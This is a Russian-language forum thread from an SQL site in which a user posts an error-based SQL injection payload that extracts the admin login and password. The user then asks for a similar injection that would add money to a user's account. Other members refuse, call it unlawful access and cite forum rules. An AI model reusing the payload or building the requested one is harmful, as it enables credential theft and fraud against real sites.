
Новые сообщения [новые:0]
Дайджест
Горячие темы
Избранное [новые:0]
Форумы
Пользователи
Статистика
Статистика нагрузки
Мод. лог
Поиск
|
|
09.08.2014, 12:53:40
|
|||
|---|---|---|---|
|
|||
написать запрос, отблагодарю |
|||
|
#18+
Столкнулся с такой вещью и вообще не понимаю как она написана: автор'and(select 1 from(select count(*),concat((select (select concat(login,'',pass) from admin where id = 1) from information_schema.tables limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x) a)and' Этот код вставляется в пост на сайте и если нет обработки, то вы водит логин и пароль от админки. Мне нужно написать такой же код, который так же через пост начислял бы пользователю средства. Таблица в базе - users, средства в базу - money То есть нужно что бы код зачислял money в таблице users id = 5 Отблагодарю) ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 13:58:37
|
|||
|---|---|---|---|
написать запрос, отблагодарю |
|||
|
#18+
imfak12, фигассе ! да ты хакер ! ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 14:27:38
|
|||
|---|---|---|---|
|
|||
написать запрос, отблагодарю |
|||
|
#18+
Если бы им был, то не обратился бы сюда. Так что, мне здесь помогут? ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 14:36:41
|
|||
|---|---|---|---|
написать запрос, отблагодарю |
|||
|
#18+
imfak12Этот код вставляется в пост на сайте и если нет обработки, то вы водит логин и пароль от админки.сказки код в скобках между эндами Код: sql 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. всегда выводит 2 числа какие - думайте сами ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 14:50:34
|
|||
|---|---|---|---|
|
|||
написать запрос, отблагодарю |
|||
|
#18+
Какие сказки? Код проверял сам и действительно выводит логин и пароль от админки. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 19:28:09
|
|||
|---|---|---|---|
написать запрос, отблагодарю |
|||
|
#18+
imfak12Какие сказки? Код проверял сам и действительно выводит логин и пароль от админки. А это что выводит? Код: sql 1. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 20:37:41
|
|||
|---|---|---|---|
написать запрос, отблагодарю |
|||
|
#18+
Pallaris, да какая разница, вы на обрамляющий код взгляните :) ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 20:50:38
|
|||
|---|---|---|---|
|
|||
написать запрос, отблагодарю |
|||
|
#18+
Ребят, вы поймите, что этот код вставляется не в phpmyadmin, а на самом сайте в посты, например написано Введите своё имя и вместо имени закидываешь код целиком и выводится логин и пароль админа. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 21:25:33
|
|||
|---|---|---|---|
написать запрос, отблагодарю |
|||
|
#18+
imfak12, мы все понимаем. а так же понимаем, что тебе не нужно это знать. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 21:45:56
|
|||
|---|---|---|---|
|
|||
написать запрос, отблагодарю |
|||
|
#18+
Ясно, так бы сразу и сказали, я бы не парился и обратился к реально знающим людям. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 21:48:29
|
|||
|---|---|---|---|
написать запрос, отблагодарю |
|||
|
#18+
imfak12, большинство "знающих" людей тоже недолюбливают подобный поверхностный подход. Тем более, что он связан с неправомерным доступом. Хочешь овладеть методикой - сиди, читай, экспериментируй, разбирайся. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 21:51:42
|
|||
|---|---|---|---|
|
|||
написать запрос, отблагодарю |
|||
|
#18+
Я же сказал, что отблагодарю и вникать мне в это не нужно, т.к это разовый случай, как я понял действительно нет смысла сидеть тут. Я думал тут реально в sql разбираются, а тут только могут лезть в другие дела и быть такими правильными. ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 21:52:37
|
|||
|---|---|---|---|
|
|||
написать запрос, отблагодарю |
|||
|
#18+
Не поймите меня неправильно, но хоть форум и по sql, здесь в нём мне ни кто не помог. Пустая трата времени... ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|
09.08.2014, 22:04:19
|
|||
|---|---|---|---|
написать запрос, отблагодарю |
|||
|
#18+
imfak12Не поймите меня неправильно, но хоть форум и по sql, здесь в нём мне ни кто не помог. Пустая трата времени...может, по указанным выше причинам а может, потому что Правила форума на SQL.RUСодержание сообщений Запрещается: <...> публикация серийных ключей, лицензий, способов взлома ПО и других методов, которые можно квалифицировать как преследуемые по закону ; ... |
|||
|
:
Нравится:
Не нравится:
|
|||
|
|
|

start [/forum/topic.php?fid=47&tablet=1&tid=1834388]: |
0ms |
get settings: |
5ms |
get forum list: |
15ms |
check forum access: |
3ms |
check topic access: |
3ms |
track hit: |
36ms |
get topic data: |
6ms |
get forum data: |
1ms |
get page messages: |
38ms |
get tp. blocked users: |
2ms |
| others: | 219ms |
| total: | 328ms |

| 0 / 0 |
